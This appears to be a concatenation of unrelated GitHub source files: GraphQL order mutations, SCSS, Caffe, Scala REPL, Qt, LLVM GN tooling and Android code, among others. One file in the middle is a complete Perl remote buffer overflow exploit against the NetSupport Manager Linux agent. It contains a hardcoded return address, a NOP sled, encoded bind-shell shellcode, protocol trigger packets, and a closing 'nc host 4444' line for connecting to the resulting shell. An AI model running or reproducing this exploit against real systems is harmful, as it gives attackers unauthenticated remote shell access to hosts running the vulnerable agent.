export const TypedOrderDraftFinalizeMutation = TypedMutation<
OrderDraftFinalize,
OrderDraftFinalizeVariables
>(orderDraftFinalizeMutation);
const orderRefundMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderRefund($id: ID!, $amount: PositiveDecimal!) {
orderRefund(id: $id, amount: $amount) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderRefundMutation = TypedMutation<
OrderRefund,
OrderRefundVariables
>(orderRefundMutation);
const orderVoidMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderVoid($id: ID!) {
orderVoid(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderVoidMutation = TypedMutation<
OrderVoid,
OrderVoidVariables
>(orderVoidMutation);
const orderMarkAsPaidMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderMarkAsPaid($id: ID!) {
orderMarkAsPaid(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderMarkAsPaidMutation = TypedMutation<
OrderMarkAsPaid,
OrderMarkAsPaidVariables
>(orderMarkAsPaidMutation);
const orderCaptureMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderCapture($id: ID!, $amount: PositiveDecimal!) {
orderCapture(id: $id, amount: $amount) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderCaptureMutation = TypedMutation<
OrderCapture,
OrderCaptureVariables
>(orderCaptureMutation);
const orderFulfillmentUpdateTrackingMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderFulfillmentUpdateTracking(
$id: ID!
$input: FulfillmentUpdateTrackingInput!
) {
orderFulfillmentUpdateTracking(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderFulfillmentUpdateTrackingMutation = TypedMutation<
OrderFulfillmentUpdateTracking,
OrderFulfillmentUpdateTrackingVariables
>(orderFulfillmentUpdateTrackingMutation);
const orderFulfillmentCancelMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderFulfillmentCancel($id: ID!, $input: FulfillmentCancelInput!) {
orderFulfillmentCancel(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderFulfillmentCancelMutation = TypedMutation<
OrderFulfillmentCancel,
OrderFulfillmentCancelVariables
>(orderFulfillmentCancelMutation);
const orderAddNoteMutation = gql`
${fragmentOrderEvent}
${orderErrorFragment}
mutation OrderAddNote($order: ID!, $input: OrderAddNoteInput!) {
orderAddNote(order: $order, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
id
events {
...OrderEventFragment
}
}
}
}
`;
export const TypedOrderAddNoteMutation = TypedMutation<
OrderAddNote,
OrderAddNoteVariables
>(orderAddNoteMutation);
const orderUpdateMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderUpdate($id: ID!, $input: OrderUpdateInput!) {
orderUpdate(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderUpdateMutation = TypedMutation<
OrderUpdate,
OrderUpdateVariables
>(orderUpdateMutation);
const orderDraftUpdateMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderDraftUpdate($id: ID!, $input: DraftOrderInput!) {
draftOrderUpdate(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderDraftUpdateMutation = TypedMutation<
OrderDraftUpdate,
OrderDraftUpdateVariables
>(orderDraftUpdateMutation);
const orderShippingMethodUpdateMutation = gql`
${orderErrorFragment}
mutation OrderShippingMethodUpdate(
$id: ID!
$input: OrderUpdateShippingInput!
) {
orderUpdateShipping(order: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
availableShippingMethods {
id
name
}
id
shippingMethod {
id
name
price {
amount
currency
}
}
shippingMethodName
shippingPrice {
gross {
amount
currency
}
}
}
}
}
`;
export const TypedOrderShippingMethodUpdateMutation = TypedMutation<
OrderShippingMethodUpdate,
OrderShippingMethodUpdateVariables
>(orderShippingMethodUpdateMutation);
const orderDraftCreateMutation = gql`
${orderErrorFragment}
mutation OrderDraftCreate {
draftOrderCreate(input: {}) {
errors: orderErrors {
...OrderErrorFragment
}
order {
id
}
}
}
`;
export const useOrderDraftCreateMutation = makeMutation<OrderDraftCreate, {}>(
orderDraftCreateMutation
);
const orderLineDeleteMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderLineDelete($id: ID!) {
draftOrderLineDelete(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderLineDeleteMutation = TypedMutation<
OrderLineDelete,
OrderLineDeleteVariables
>(orderLineDeleteMutation);
const orderLinesAddMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderLinesAdd($id: ID!, $input: [OrderLineCreateInput]!) {
draftOrderLinesCreate(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderLinesAddMutation = TypedMutation<
OrderLinesAdd,
OrderLinesAddVariables
>(orderLinesAddMutation);
const orderLineUpdateMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderLineUpdate($id: ID!, $input: OrderLineInput!) {
draftOrderLineUpdate(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderLineUpdateMutation = TypedMutation<
OrderLineUpdate,
OrderLineUpdateVariables
>(orderLineUpdateMutation);
const fulfillOrder = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation FulfillOrder($orderId: ID!, $input: OrderFulfillInput!) {
orderFulfill(order: $orderId, input: $input) {
errors: orderErrors {
...OrderErrorFragment
warehouse
orderLine
}
order {
...OrderDetailsFragment
}
}
}
`;
export const useOrderFulfill = makeMutation<
FulfillOrder,
FulfillOrderVariables
>(fulfillOrder);
const invoiceRequestMutation = gql`
${invoiceErrorFragment}
${invoiceFragment}
mutation InvoiceRequest($orderId: ID!) {
invoiceRequest(orderId: $orderId) {
errors: invoiceErrors {
...InvoiceErrorFragment
}
invoice {
...InvoiceFragment
}
order {
id
invoices {
...InvoiceFragment
}
}
}
}
`;
export const TypedInvoiceRequestMutation = TypedMutation<
InvoiceRequest,
InvoiceRequestVariables
>(invoiceRequestMutation);
const invoiceEmailSendMutation = gql`
${invoiceErrorFragment}
${invoiceFragment}
mutation InvoiceEmailSend($id: ID!) {
invoiceSendEmail(id: $id) {
errors: invoiceErrors {
...InvoiceErrorFragment
}
invoice {
...InvoiceFragment
}
}
}
`;
export const TypedInvoiceEmailSendMutation = TypedMutation<
InvoiceEmailSend,
InvoiceEmailSendVariables
>(invoiceEmailSendMutation);
| {
"pile_set_name": "Github"
} |
#!/usr/bin/perl
#
# NetSupport Manager Agent Remote Buffer Overflow
# Product details: http://www.netsupportmanager.com/
#
# This vulnerability affects the following software:
#
# [Vulnerable]
# NetSupport Manager for Linux v11.00 and likely all previous
# NetSupport Manager for Solaris v9.50 and likely all previous
# NetSupport Manager for Mac OS X v11.00 and likely all previous
#
# [Not Vulnerable]
# Netsupport Manager for Windows v11.00
#
# [Unknown]
# Netsupport Manager for Windows CE v11.00
# Netsupport Manager for Pocket PC v11.00
# NetSupport Manager for DOS v7.01
# Other products based on the same codebase (e.g. NetSupport School)
#
# This exploit has been tested against:
# - NetSupport Manager Linux agent v10.50.0
# - NetSupport Manager Linux agent v11.0.0
#
# As far as I know, this is still unpatched.
#
# Credit: Luca Carettoni (@_ikki)
use strict;
use warnings;
use IO::Socket;
my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 5405;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, Proto => 'tcp') or die "error: $!\n";
print "--[ NetSupport Manager Linux Agent Remote Buffer Overflow ]\n";
print "--[ \@_ikki 2010 ]\n\n";
#my $ret_address = 0x0808bd4f; #jmp esp /usr/nsm/daemon/clientdaemon v10.50.0
my $ret_address = 0x0808c4bf; #jmp esp /usr/nsm/daemon/clientdaemon v11.0.0
my $pad = 976;
my $nop = "\x90" x 50;
# linux/x86/shell_bind_tcp - 217 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# AutoRunScript=, AppendExit=false, PrependChrootBreak=false,
# PrependSetresuid=false, InitialAutoRunScript=,
# PrependSetuid=false, LPORT=4444, RHOST=,
# PrependSetreuid=false
my $shellcode =
"\x89\xe0\xdb\xcb\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x46\x51\x49\x4b\x4c\x37\x4a\x43\x51\x43\x43" .
"\x73\x43\x63\x43\x5a\x44\x42\x4c\x49\x4b\x51\x48\x30\x51" .
"\x76\x4a\x6d\x4d\x50\x43\x6b\x51\x4e\x50\x52\x43\x58\x49" .
"\x6f\x47\x72\x47\x61\x51\x4c\x43\x5a\x42\x30\x42\x71\x46" .
"\x30\x4c\x49\x48\x61\x51\x7a\x45\x36\x46\x38\x48\x4d\x4d" .
"\x50\x4c\x49\x51\x51\x46\x64\x4d\x63\x46\x64\x4c\x70\x45" .
"\x36\x4a\x6d\x4b\x30\x51\x53\x4c\x70\x51\x76\x4a\x6d\x4b" .
"\x30\x4e\x73\x50\x59\x50\x6a\x47\x4f\x46\x38\x4a\x6d\x4b" .
"\x30\x47\x39\x43\x49\x49\x68\x50\x68\x46\x4f\x46\x4f\x42" .
"\x53\x45\x38\x51\x78\x46\x4f\x45\x32\x50\x69\x50\x6e\x4d" .
"\x59\x49\x73\x50\x50\x42\x73\x4b\x39\x49\x71\x4c\x70\x44" .
"\x4b\x48\x4d\x4d\x50\x41\x41";
my $triggerA = "\x15\x00\x5a\x00".("\x41" x 1024)."\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
my $triggerB = "\x25\x00\x51\x00\x81\x41\x41\x41\x41\x41\x41\x00".
"\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00";
my $triggerC = "\x37\x00\x03\x00\x0a\x00\x00\x00\x00\x00\x58\xb4".
"\x92\xff\x00\x00\x69\x6b\x6b\x69\x00\x57\x4f\x52".
"\x4b\x47\x52\x4f\x55\x50\x00\x3c\x3e". #pleasure trail
("A"x$pad).pack("V", $ret_address).$nop.$shellcode.
"\x00\x00\x31\x32\x2e\x36\x32\x2e\x31\x2e\x34\x32".
"\x30\x00\x31\x30\x00\x00";
my $triggerD = "\x06\x00\x07\x00\x20\x00\x00\x00\x0e\x00\x32\x00".
"\x01\x10\x18\x00\x00\x01\x9f\x0d\x00\x00\xe0\x07".
"\x06\x00\x07\x00\x00\x00\x00\x00\x02\x00\x4e\x00".
"\x02\x00\xac\x00\x04\x00\x7f\x00\x00\x00";
print "Sending triggers...\n";
$sock->send($triggerA);
sleep 1;
$sock->send($triggerB);
sleep 1;
$sock->send($triggerC);
sleep 1;
$sock->send($triggerD);
sleep 1;
$sock->close;
print "A shell is waiting: \"nc ".$host." 4444\"\n\n"; | {
"pile_set_name": "Github"
} |
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by lister-gen. DO NOT EDIT.
package v1
| {
"pile_set_name": "Github"
} |
* {
box-sizing: border-box;
}
.clear {
clear: both;
}
.clearfix {
&:before, &:after {
clear: both;
display: table;
content: "";
}
}
.xcode .hide-in-xcode {
display: none;
}
body {
font: 62.5% $body-font;
background: $body-background;
@media (max-width: $mobile-max-width) {
background-color: $content-background;
}
}
h1, h2, h3 {
font-weight: 300;
color: #808080;
}
h1 {
font-size: 2em;
color: #000;
}
h4 {
font-size: 13px;
line-height: 1.5;
margin: 21px 0 0 0;
}
a {
color: $tint-color;
text-decoration: none;
}
pre, code {
font-family: $code-font;
word-wrap: break-word;
}
pre > code, .method-declaration code {
display: inline-block;
font-size: .85em;
padding: 4px 0 4px 10px;
border-left: 5px solid rgba(0, 155, 51, .2);
&:before {
content: "Objective-C";
display: block;
font: 9px/1 $body-font;
color: #009b33;
text-transform: uppercase;
letter-spacing: 2px;
padding-bottom: 6px;
}
}
pre > code {
font-size: inherit;
}
table, th, td {
border: 1px solid #e9e9e9;
}
table {
width: 100%;
}
th, td {
padding: 7px;
> :first-child {
margin-top: 0;
}
> :last-child {
margin-bottom: 0;
}
}
.container {
@extend .clearfix;
max-width: 980px;
padding: 0 10px;
margin: 0 auto;
@media (max-width: $mobile-max-width) {
padding: 0;
}
}
header {
position: fixed;
top: 0;
left: 0;
width: 100%;
z-index: 2;
background: #414141;
color: #fff;
font-size: 1.1em;
line-height: 25px;
letter-spacing: .05em;
#library-title {
float: left;
}
#developer-home {
float: right;
}
h1 {
font-size: inherit;
font-weight: inherit;
margin: 0;
}
p {
margin: 0;
}
h1, a {
color: inherit;
}
@media (max-width: $mobile-max-width) {
.container {
padding: 0 10px;
}
}
}
aside {
position: fixed;
top: 25px;
left: 0;
width: 100%;
height: 25px;
z-index: 2;
font-size: 1.1em;
#header-buttons {
background: rgba(255, 255, 255, .8);
margin: 0 1px;
padding: 0;
list-style: none;
text-align: right;
line-height: 32px;
li {
display: inline-block;
cursor: pointer;
padding: 0 10px;
}
label, select {
cursor: inherit;
}
#on-this-page {
position: relative;
.chevron {
display: inline-block;
width: 14px;
height: 4px;
position: relative;
.chevy {
background: #878787;
height: 2px;
position: absolute;
width: 10px;
&.chevron-left {
left: 0;
transform: rotateZ(45deg) scale(0.6);
}
&.chevron-right {
right: 0;
transform: rotateZ(-45deg) scale(0.6);
}
}
}
#jump-to {
opacity: 0;
font-size: 16px;
position: absolute;
top: 5px;
left: 0;
width: 100%;
height: 100%;
}
}
}
}
article {
margin-top: 25px;
#content {
@extend .clearfix;
background: $content-background;
border: 1px solid $content-border;
padding: 15px 25px 30px 25px;
font-size: 1.4em;
line-height: 1.45;
position: relative;
@media (max-width: $mobile-max-width) {
padding: 15px 10px 20px 10px;
border: none;
}
.navigation-top {
position: absolute;
top: 15px;
right: 25px;
}
.title {
margin: 21px 0 0 0;
padding: 15px 0;
}
p {
color: #414141;
margin: 0 0 15px 0;
}
th, td {
p:last-child {
margin-bottom: 0;
}
}
main {
ul {
list-style: none;
margin-left: 24px;
margin-bottom: 12px;
padding: 0;
li {
position: relative;
padding-left: 1.3em;
&:before {
content: "\02022";
color: #414141;
font-size: 1.08em;
line-height: 1;
position: absolute;
left: 0;
padding-top: 2px;
}
}
}
}
footer {
@extend .clearfix;
.footer-copyright {
margin: 70px 25px 10px 0;
}
p {
font-size: .71em;
color: #a0a0a0;
}
}
}
}
| {
"pile_set_name": "Github"
} |
"""Tests to ensure that the html.parser tree builder generates good
trees."""
from pdb import set_trace
import pickle
from bs4.testing import SoupTest, HTMLTreeBuilderSmokeTest
from bs4.builder import HTMLParserTreeBuilder
class HTMLParserTreeBuilderSmokeTest(SoupTest, HTMLTreeBuilderSmokeTest):
@property
def default_builder(self):
return HTMLParserTreeBuilder()
def test_namespaced_system_doctype(self):
# html.parser can't handle namespaced doctypes, so skip this one.
pass
def test_namespaced_public_doctype(self):
# html.parser can't handle namespaced doctypes, so skip this one.
pass
def test_builder_is_pickled(self):
"""Unlike most tree builders, HTMLParserTreeBuilder and will
be restored after pickling.
"""
tree = self.soup("<a><b>foo</a>")
dumped = pickle.dumps(tree, 2)
loaded = pickle.loads(dumped)
self.assertTrue(isinstance(loaded.builder, type(tree.builder)))
| {
"pile_set_name": "Github"
} |
#ifndef CAFFE_SIGMOID_LAYER_HPP_
#define CAFFE_SIGMOID_LAYER_HPP_
#include <vector>
#include "caffe/blob.hpp"
#include "caffe/layer.hpp"
#include "caffe/proto/caffe.pb.h"
#include "caffe/layers/neuron_layer.hpp"
namespace caffe {
/**
* @brief Sigmoid function non-linearity @f$
* y = (1 + \exp(-x))^{-1}
* @f$, a classic choice in neural networks.
*
* Note that the gradient vanishes as the values move away from 0.
* The ReLULayer is often a better choice for this reason.
*/
template <typename Dtype>
class SigmoidLayer : public NeuronLayer<Dtype> {
public:
explicit SigmoidLayer(const LayerParameter& param)
: NeuronLayer<Dtype>(param) {}
virtual inline const char* type() const { return "Sigmoid"; }
protected:
/**
* @param bottom input Blob vector (length 1)
* -# @f$ (N \times C \times H \times W) @f$
* the inputs @f$ x @f$
* @param top output Blob vector (length 1)
* -# @f$ (N \times C \times H \times W) @f$
* the computed outputs @f$
* y = (1 + \exp(-x))^{-1}
* @f$
*/
virtual void Forward_cpu(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top);
virtual void Forward_gpu(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top);
/**
* @brief Computes the error gradient w.r.t. the sigmoid inputs.
*
* @param top output Blob vector (length 1), providing the error gradient with
* respect to the outputs
* -# @f$ (N \times C \times H \times W) @f$
* containing error gradients @f$ \frac{\partial E}{\partial y} @f$
* with respect to computed outputs @f$ y @f$
* @param propagate_down see Layer::Backward.
* @param bottom input Blob vector (length 1)
* -# @f$ (N \times C \times H \times W) @f$
* the inputs @f$ x @f$; Backward fills their diff with
* gradients @f$
* \frac{\partial E}{\partial x}
* = \frac{\partial E}{\partial y} y (1 - y)
* @f$ if propagate_down[0]
*/
virtual void Backward_cpu(const vector<Blob<Dtype>*>& top,
const vector<bool>& propagate_down, const vector<Blob<Dtype>*>& bottom);
virtual void Backward_gpu(const vector<Blob<Dtype>*>& top,
const vector<bool>& propagate_down, const vector<Blob<Dtype>*>& bottom);
};
} // namespace caffe
#endif // CAFFE_SIGMOID_LAYER_HPP_
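// --- Illustrative sketch (not part of Caffe) ---------------------------------
// The forward/backward formulas documented above, exercised on plain scalars.
// This is a standalone example for clarity, not Caffe's actual CPU/GPU kernels.
//
//   #include <cmath>
//
//   // Forward: y = 1 / (1 + exp(-x))
//   inline double sigmoid(double x) { return 1.0 / (1.0 + std::exp(-x)); }
//
//   // Backward: dE/dx = dE/dy * y * (1 - y)
//   inline double sigmoid_backward(double top_diff, double y) {
//     return top_diff * y * (1.0 - y);
//   }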
| {
"pile_set_name": "Github"
} |
/* NSC -- new Scala compiler
* Copyright 2005-2013 LAMP/EPFL
* @author Stepan Koltsov
*/
package scala.tools.nsc.interpreter.shell
import java.io.IOException
import InteractiveReader._
/** Reads lines from an input stream */
trait InteractiveReader {
def interactive: Boolean
def reset(): Unit
def history: History
def completion: Completion
def redrawLine(): Unit
def readYesOrNo(prompt: String, alt: => Boolean): Boolean = readOneKey(prompt) match {
case 'y' => true
case 'n' => false
case -1 => false // EOF
case _ => alt
}
protected def readOneLine(prompt: String): String
protected def readOneKey(prompt: String): Int
def readLine(prompt: String): String =
// hack necessary for OSX jvm suspension because read calls are not restarted after SIGTSTP
if (scala.util.Properties.isMac) restartSysCalls(readOneLine(prompt), reset())
else readOneLine(prompt)
def initCompletion(completion: Completion): Unit = {}
}
object InteractiveReader {
val msgEINTR = "Interrupted system call"
def restartSysCalls[R](body: => R, reset: => Unit): R =
try body catch {
case e: IOException if e.getMessage == msgEINTR => reset ; body
}
def apply(): InteractiveReader = SimpleReader()
}
/** Collect one line of user input from the supplied reader.
* Runs on a new thread while the REPL is initializing on the main thread.
*
* The user can enter text or a `:paste` command.
*
* TODO: obsolete the whole splash loop by making interpreter always run in separate thread from the UI,
* and communicating with it like we do in the presentation compiler
*/
class SplashLoop(in: InteractiveReader, prompt: String) extends Runnable {
import java.lang.System.{lineSeparator => EOL}
import java.util.concurrent.SynchronousQueue
private val result = new SynchronousQueue[Option[String]]
@volatile private var running: Boolean = _
private var thread: Thread = _
/** Read one line of input which can be retrieved with `line`. */
def run(): Unit = {
var input = ""
try
while (input != null && input.isEmpty && running) {
input = in.readLine(prompt)
if (input != null) {
val trimmed = input.trim
if (trimmed.length >= 3 && ":paste".startsWith(trimmed))
input = readPastedLines
}
}
finally {
try result.put(Option(input))
catch { case ie: InterruptedException => } // we may have been interrupted because the interpreter reported an error
}
}
/** Process `:paste`d input. */
private def readPastedLines: String = {
// while collecting lines, check running flag
var help = f"// Entering paste mode (ctrl-D to finish)%n%n"
val text =
try
Iterator continually in.readLine(help) takeWhile { x =>
help = ""
x != null && running
} mkString EOL trim
catch { case ie: InterruptedException => "" } // TODO let the exception bubble up, or at least signal the interrupt happened?
val next =
if (text.isEmpty) "// Nothing pasted, nothing gained."
else "// Exiting paste mode, now interpreting."
Console println f"%n${next}%n"
text
}
def start(): Unit = result.synchronized {
require(thread == null, "Already started")
thread = new Thread(this)
running = true
thread.start()
}
def stop(): Unit = result.synchronized {
running = false
if (thread != null) thread.interrupt()
thread = null
}
/** Blocking. Returns Some(input) when received during splash loop, or None if interrupted (e.g., ctrl-D). */
def line: Option[String] = result.take
}
object SplashLoop {
def readLine(in: InteractiveReader, prompt: String)(body: => Unit): Option[String] = {
val splash = new SplashLoop(in, prompt)
try { splash.start; body ; splash.line }
catch { case ie: InterruptedException => Some(null) }
finally splash.stop()
}
}
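// --- Illustrative usage sketch (not part of the original file) --------------
// SplashLoop.readLine collects one line (or a :paste block) on a background
// thread while `body` runs on the calling thread, e.g. (sketch; `in` is an
// already-constructed InteractiveReader):
//
//   val firstLine: Option[String] =
//     SplashLoop.readLine(in, "scala> ") {
//       // expensive interpreter initialization would run here
//     }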
| {
"pile_set_name": "Github"
} |
@import 'nib/clearfix'
support-for-ie = true
#clearfix
clearfix()
| {
"pile_set_name": "Github"
} |
/*=====================================================================
QGroundControl Open Source Ground Control Station
(c) 2009, 2010 QGROUNDCONTROL PROJECT <http://www.qgroundcontrol.org>
This file is part of the QGROUNDCONTROL project
QGROUNDCONTROL is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
QGROUNDCONTROL is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with QGROUNDCONTROL. If not, see <http://www.gnu.org/licenses/>.
======================================================================*/
/**
* @file
* @brief Implementation of class WatchdogControl
* @author Lorenz Meier <[email protected]>
*
*/
#include "WatchdogProcessView.h"
#include "ui_WatchdogProcessView.h"
WatchdogProcessView::WatchdogProcessView(int processid, QWidget *parent) :
QWidget(parent),
processid(processid),
m_ui(new Ui::WatchdogProcessView)
{
m_ui->setupUi(this);
}
WatchdogProcessView::~WatchdogProcessView()
{
delete m_ui;
}
void WatchdogProcessView::changeEvent(QEvent *e)
{
QWidget::changeEvent(e);
switch (e->type()) {
case QEvent::LanguageChange:
m_ui->retranslateUi(this);
break;
default:
break;
}
}
| {
"pile_set_name": "Github"
} |
json.title notification.notification_type
json.description t('.your_reservation_slot_was_successfully_changed')
| {
"pile_set_name": "Github"
} |
{% extends "email/form_response.html" %}
{% block main %}
{{ block.super }}
{% endblock %}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
"""Helps to keep BUILD.gn files in sync with the corresponding CMakeLists.txt.
For each BUILD.gn file in the tree, checks if the list of cpp files in
it is identical to the list of cpp files in the corresponding CMakeLists.txt
file, and prints the difference if not.
Also checks that each CMakeLists.txt file below unittests/ folders that define
binaries have corresponding BUILD.gn files.
"""
from __future__ import print_function
import os
import re
import subprocess
def sync_source_lists():
# Use shell=True on Windows in case git is a bat file.
gn_files = subprocess.check_output(['git', 'ls-files', '*BUILD.gn'],
shell=os.name == 'nt').splitlines()
# Matches e.g. | "foo.cpp",|, captures |foo| in group 1.
gn_cpp_re = re.compile(r'^\s*"([^"]+\.(?:cpp|c|h|S))",$', re.MULTILINE)
# Matches e.g. | foo.cpp|, captures |foo| in group 1.
cmake_cpp_re = re.compile(r'^\s*([A-Za-z_0-9./-]+\.(?:cpp|c|h|S))$',
re.MULTILINE)
for gn_file in gn_files:
# The CMakeLists.txt for llvm/utils/gn/secondary/foo/BUILD.gn is
# directly at foo/CMakeLists.txt.
strip_prefix = 'llvm/utils/gn/secondary/'
if not gn_file.startswith(strip_prefix):
continue
cmake_file = os.path.join(
os.path.dirname(gn_file[len(strip_prefix):]), 'CMakeLists.txt')
if not os.path.exists(cmake_file):
continue
def get_sources(source_re, text):
return set([m.group(1) for m in source_re.finditer(text)])
gn_cpp = get_sources(gn_cpp_re, open(gn_file).read())
cmake_cpp = get_sources(cmake_cpp_re, open(cmake_file).read())
if gn_cpp == cmake_cpp:
continue
print(gn_file)
add = cmake_cpp - gn_cpp
if add:
print('add:\n' + '\n'.join(' "%s",' % a for a in add))
remove = gn_cpp - cmake_cpp
if remove:
print('remove:\n' + '\n'.join(remove))
print()
def sync_unittests():
# Matches e.g. |add_llvm_unittest_with_input_files|.
unittest_re = re.compile(r'^add_\S+_unittest', re.MULTILINE)
checked = [ 'clang', 'clang-tools-extra', 'lld', 'llvm' ]
for c in checked:
for root, _, _ in os.walk(os.path.join(c, 'unittests')):
cmake_file = os.path.join(root, 'CMakeLists.txt')
if not os.path.exists(cmake_file):
continue
if not unittest_re.search(open(cmake_file).read()):
continue # Skip CMake files that just add subdirectories.
gn_file = os.path.join('llvm/utils/gn/secondary', root, 'BUILD.gn')
if not os.path.exists(gn_file):
print('missing GN file %s for unittest CMake file %s' %
(gn_file, cmake_file))
def main():
sync_source_lists()
sync_unittests()
if __name__ == '__main__':
main()
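# --- Illustrative usage note (not part of the original script) ---------------
# Run from the monorepo root with no arguments (the path below is the usual
# location of this script in the LLVM GN tree; adjust if it differs):
#
#   python llvm/utils/gn/build/sync_source_lists_from_cmake.py
#
# For each out-of-sync BUILD.gn the script prints the file name followed by
# "add:" / "remove:" blocks listing the sources to copy into or drop from the
# GN file; missing unittest BUILD.gn files are reported separately.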
| {
"pile_set_name": "Github"
} |
6
4
6
19
4
5
4
8
9
52
9
14
60
18
9
6
8
17
25
6
6
9
8
8
17
98
7
8
15
57
5
8
15
51
11
12
12
9
12
20
26
18
12
9
8
9
8
7
6
12
2
69
77
13
10
9
7
85
17
9
7
20
10
6
10
19
18
55
22
10
11
15
21
13
7
61
7
7
15
6
10
7
64
9
8
9
9
13
5
11
13
5
10
25
17
12
12
88
27
8
11
10
6
11
48
11
13
93
8
17
13
69
25
17
43
10
8
11
6
9
12
6
6
47
12
6
13
14
19
8
13
9
14
13
11
13
6
15
84
9
71
11
7
11
17
56
21
10
15
17
13
66
13
10
17
9
2
8
10
13
10
98
12
8
15
12
11
25
10
7
8
46
13
10
11
7
16
31
56
32
39
34
14
9
17
16
82
7
39
58
30
5
17
12
8
16
5
4
98
13
10
48
11
7
11
7
9
13
14
7
8
54
10
20
2
15
19
8
5
5
23
8
10
10
12
8
63
29
9
13
11
46
31
41
5
75
12
63
15
6
17
2
30
4
6
54
5
7
49
5
5
5
7
5
8
7
13
6
57
5
7
7
9
7
7
26
4
5
21
5
15
41
15
15
4
8
55
5
11
59
5
81
47
4
7
20
37
3
| {
"pile_set_name": "Github"
} |
package com.mapswithme.maps.search;
import android.os.Bundle;
import android.view.View;
import android.widget.ImageView;
import android.widget.TextView;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.annotation.StringRes;
import androidx.core.content.ContextCompat;
import com.mapswithme.maps.R;
import com.mapswithme.maps.widget.SearchToolbarController;
import com.mapswithme.util.UiUtils;
public class SearchFilterController implements SearchToolbarController.FilterParamsChangedListener
{
private static final String STATE_HOTEL_FILTER = "state_hotel_filter";
private static final String STATE_FILTER_PARAMS = "state_filter_params";
private static final String STATE_HOTEL_FILTER_VISIBILITY = "state_hotel_filter_visibility";
@NonNull
private final View mFrame;
@NonNull
private final TextView mShowOnMap;
@NonNull
private final View mFilterButton;
@NonNull
private final ImageView mFilterIcon;
@NonNull
private final TextView mFilterText;
@NonNull
private final View mDivider;
@Nullable
private HotelsFilter mFilter;
@Nullable
private BookingFilterParams mBookingFilterParams;
private boolean mHotelMode;
@NonNull
private final SearchToolbarController mToolbarController;
@NonNull
private final View.OnClickListener mClearListener = new View.OnClickListener()
{
@Override
public void onClick(View v)
{
setFilter(null);
if (mFilterListener != null)
mFilterListener.onFilterClear();
}
};
@Nullable
private final FilterListener mFilterListener;
@Override
public void onBookingParamsChanged()
{
mBookingFilterParams = mToolbarController.getFilterParams();
if (mFilterListener != null)
mFilterListener.onFilterParamsChanged();
}
public boolean isSatisfiedForSearch()
{
return mFilter != null || mBookingFilterParams != null;
}
interface FilterListener
{
void onShowOnMapClick();
void onFilterClick();
void onFilterClear();
void onFilterParamsChanged();
}
SearchFilterController(@NonNull View frame, @Nullable FilterListener listener,
@NonNull SearchToolbarController toolbarController)
{
this(frame, listener, R.string.search_show_on_map, toolbarController);
}
